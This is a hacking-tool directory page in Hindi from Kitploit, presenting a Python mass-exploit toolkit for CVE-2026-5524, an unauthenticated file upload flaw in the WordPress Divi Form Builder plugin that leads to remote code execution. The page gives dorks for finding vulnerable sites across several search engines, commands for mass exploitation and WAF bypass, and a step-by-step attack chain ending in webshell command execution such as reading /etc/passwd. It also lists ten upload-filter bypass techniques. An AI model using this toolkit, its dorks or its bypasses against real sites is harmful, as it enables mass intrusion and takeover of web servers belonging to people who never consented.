Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-5524-PoC — CVE-2026-5524 के लिए Python मास-एक्सप्लॉइट टूलकिट, जो WordPress Divi Form Builder प्लगइन में एक अनऑथेंटिकेटेड फ़ाइल अपलोड RCE है, जिसमें webshell अपलोड और कमांड निष्पादन शामिल है। | Kitploit
उपकरण/GitHubGitHub/iicaicai/cve-2026-5524-poc
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनाWAF बाईपासवेब सुरक्षापेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंटरिमोट एक्सेस ट्रोजन
253 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
iicaicai/cve-2026-5524-poc

CVE-2026-5524-PoC

CVE-2026-5524 के लिए Python मास-एक्सप्लॉइट टूलकिट, जो WordPress Divi Form Builder प्लगइन में एक अनऑथेंटिकेटेड फ़ाइल अपलोड RCE है, जिसमें webshell अपलोड और कमांड निष्पादन शामिल है।

रिपॉजिटरी देखें

CVE-2026-5524 — Divi Form Builder अनधिकृत RCE

CVE-2026-5524 के लिए मास एक्सप्लॉइट टूलकिट, जो WordPress प्लगइन Divi Form Builder <= 5.1.8 में एक अनधिकृत मनमाना फ़ाइल अपलोड भेद्यता है जो रिमोट कोड एक्ज़ीक्यूशन की ओर ले जाती है।

version Devon Aji python telegram

FieldValue
CVE2026-5524
CVSS9.8 (Critical)
VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AffectedDivi Form Builder <= 5.1.8
Patched5.1.9
TypeUnauthenticated File Upload to RCE
Researcher0xd4rk5id3 - EnvoraSec

Contents

  • Description
  • Dorks
  • Installation
  • Usage
    • Single target
    • Mass exploit
    • Advanced bypass
    • Command execution
  • Vulnerability details
  • Bypass techniques
  • Tech stack
  • Project structure
  • Attack flow
  • Disclaimer

Description

WordPress के लिए Divi Form Builder प्लगइन में एक अनधिकृत मनमाना फ़ाइल अपलोड भेद्यता है। do_image_upload() हैंडलर उपयोगकर्ता-नियंत्रित acceptFileTypes POST पैरामीटर को सीधे फ़ाइल एक्सटेंशन को मान्य करने के लिए उपयोग किए जाने वाले रेगुलर एक्सप्रेशन में पास करता है। phtml जैसा मान प्रदान करके, एक हमलावर प्लगइन के .htaccess नियम को बायपास कर सकता है जो केवल .php एक्सटेंशन को ब्लॉक करता है और PHP-निष्पादन योग्य एक्सटेंशन (.phtml, .phar, .php5, .php7, और समान) के साथ एक वेबशेल अपलोड कर सकता है।

एक बार फ़ाइल /wp-content/uploads/de_fb_uploads/ में पहुँच जाने के बाद, Apache इसे PHP के रूप में निष्पादित करता है, जिससे हमलावर को वेब सर्वर उपयोगकर्ता के रूप में रिमोट कोड एक्ज़ीक्यूशन प्राप्त होता है।

यह समस्या Divi Form Builder 5.1.9 में ठीक कर दी गई है।


Dorks

FOFA

body="de_fb_obj" && body="fb_nonce"

Shodan

http.html:"de_fb_obj" http.html:"fb_nonce"

Google

inurl:"/wp-content/plugins/divi-form-builder/"

ZoomEye

app:"WordPress" && body:"de_fb_obj"

Censys

services.http.response.body: "de_fb_obj"

Installation

आवश्यकताएँ: Linux, macOS, या WSL पर Python 3.8 या नया।

git clone https://github.com/caterscam/CVE-2026-5524-PoC/
cd CVE-2026-5524-PoC
pip3 install -r requirements.txt

requirements.txt

requests>=2.28.0
urllib3>=1.26.0

Usage

Single target

python3 CVE-2026-5524.py -u https://target.com

Mass exploit

python3 CVE-2026-5524.py -l targets.txt --shell-file bypass.phtml --aggressive --no-verify -o pwned.jsonl -t 20

Advanced bypass

WAF (NinjaFirewall, Wordfence, ModSecurity) के पीछे या कठोर Apache या nginx कॉन्फ़िगरेशन वाले लक्ष्यों के लिए।

python3 CVE-2026-5524.py -u https://target.com --shell-file bypass.phtml --aggressive --no-verify --debug

Command execution

सफल अपलोड के बाद, स्क्रिप्ट तुरंत एक कमांड निष्पादित कर सकती है या इंटरैक्टिव शेल में प्रवेश कर सकती है।

python3 CVE-2026-5524.py -u https://target.com --cmd "id; uname -a; cat /etc/passwd"
python3 CVE-2026-5524.py -u https://target.com --shell

Flags

FlagDescription
-u URLएकल लक्ष्य URL
-l FILEलक्ष्य सूची वाली फ़ाइल, प्रति पंक्ति एक URL
-t Nसमवर्ती थ्रेड्स की संख्या (डिफ़ॉल्ट 10)
--timeout Nसेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट 15)
-o FILEपरिणामों को JSONL आउटपुट फ़ाइल में सहेजें
--proxy URLHTTP प्रॉक्सी के माध्यम से ट्रैफ़िक रूट करें
--nonce HASHमैन्युअल रूप से प्रदान किया गया nonce उपयोग करें, ऑटोडिटेक्शन छोड़ें
--ext EXTपूरी बायपास सूची के बजाय एकल एक्सटेंशन बाध्य करें
--shellसफलता पर इंटरैक्टिव RCE शेल में प्रवेश करें (केवल एकल लक्ष्य)
--cmd CMDलक्ष्य पर एक कमांड निष्पादित करें, फिर बाहर निकलें
--shell-file FILEअंतर्निहित के बजाय कस्टम शेल पेलोड अपलोड करें
--no-verifyअपलोड के बाद RCE सत्यापन चरण छोड़ें
--strict-verifyझूठे सकारात्मक को फ़िल्टर करने के लिए पुष्टि करें कि शेल URL HTTP 200 लौटाता है
--user-iniPHP-FPM वातावरण के लिए .user.ini ड्रॉपर अपलोड करें
--htaccessApache वातावरण के लिए .htaccess पुनः-सक्षमकर्ता अपलोड करें
--aggressiveप्रत्येक उपलब्ध बायपास तकनीक सक्षम करें
--null-bytenull byte और डबल एक्सटेंशन प्रयास शामिल करें
--path-traversal/uploads/YYYY/MM/ उपनिर्देशिकाओं में अपलोड करने का प्रयास करें
--debugनिदान के लिए कच्ची HTTP प्रतिक्रियाएँ प्रिंट करें

Vulnerability details

Vulnerable code

भेद्य हैंडलर बिना सैनिटाइज़ेशन के उपयोगकर्ता इनपुट से एक regex बनाता है।

public function do_image_upload() {
    $accepted = $_POST['acceptFileTypes'];
    $pattern  = '/\\.(' . $accepted . ')$/i';

    if (preg_match($pattern, $filename)) {
        move_uploaded_file($tmp, $dest);
    }
}

acceptFileTypes=phtml भेजकर, परिणामी regex /\.(phtml)$/i .phtml में समाप्त होने वाले फ़ाइलनामों से मेल खाता है, भले ही प्लगइन की अपनी .htaccess फ़ाइल केवल .php एक्सटेंशन को ब्लॉक करती है। Apache तब अपलोड की गई फ़ाइल को PHP के रूप में निष्पादित करता है, जिससे रिमोट कोड एक्ज़ीक्यूशन उत्पन्न होता है।

Confirmed attack chain

  1. उस पृष्ठ को क्रॉल करें जिसमें Divi Form Builder फ़ॉर्म एम्बेड है (/, /contact, /quote, आदि)। Varnish, WP Rocket, और अन्य पृष्ठ कैश को हराने के लिए ?nocache=<random> पैरामीटर जोड़ें जो अन्यथा एक पुराना nonce प्रदान करेंगे।

  2. स्थानीयकृत JavaScript ऑब्जेक्ट से fb_nonce मान निकालें:

    de_fb_obj = {"fb_nonce":"<10 hex characters>", ...}
    
  3. /wp-admin/admin-ajax.php पर एक multipart फ़ॉर्म POST करें:

    action=de_fb_image_upload
    fb_nonce=<nonce>
    acceptFileTypes=phtml
    [email protected]
    
  4. JSON प्रतिक्रिया से फ़ाइल URL पढ़ें:

    {"files":[{"name":"abc123.phtml","url":"https://target/wp-content/uploads/de_fb_uploads/abc123.phtml",...}]}
    
  5. base64 एन्कोडेड कमांड के साथ शेल का अनुरोध करें:

    curl "https://target/wp-content/uploads/de_fb_uploads/abc123.phtml?x=$(echo -n id | base64)"
    

Bypass techniques

#TechniqueTargets
1वैकल्पिक PHP एक्सटेंशन .phtml, .phar, .php5, .php7, .php4, .pht, .shtmlप्लगइन .htaccess नियम जो केवल .php को ब्लॉक करता है
2केस भिन्नता .PHTML, .PHP5, .PhTmLकेस-संवेदनशील WAF हस्ताक्षर (NinjaFirewall)
3डबल एक्सटेंशन .phtml.jpg, .php.jpgApache mod_mime कंटेंट-नेगोशिएशन विचित्रताएँ
4Null byte .php%00.jpg, .phtml%00.txtपुराने PHP संस्करण (5.3.4 से कम) और कुछ पार्सर
5अनुगामी स्थान या बिंदु .php , .php.Windows IIS और पुराने Apache संस्करण
6Content-Type स्पूफिंग application/octet-streamWAF जो multipart Content-Type हेडर पर कुंजी करते हैं
7एक वास्तविक .htaccess अपलोड करें जो .gif, .png, .jpg, .txt, .html, आदि के लिए PHP पुनः सक्षम करता हैAllowOverride All वाले Apache सर्वर
8auto_prepend_file के साथ एक .user.ini अपलोड करेंPHP-FPM वातावरण
9multipart boundary हेरफेर के माध्यम से फ़ाइलनाम इंजेक्शनप्रॉक्सी और WAF जो अनुरोध बॉडी को पुनः पार्स करते हैं
10फ़ाइलनाम में पथ ट्रैवर्सल ../shell.phtmlप्लगइन निर्देशिका प्रतिबंध

स्क्रिप्ट प्रत्येक तकनीक को प्राथमिकता क्रम में आज़माती है और, जब --aggressive सेट होता है, तो पहले अपलोड के सफलता की रिपोर्ट के बाद भी प्रत्येक को आज़माती है।


Tech stack

Exploit script

टूल डाउनलोड करें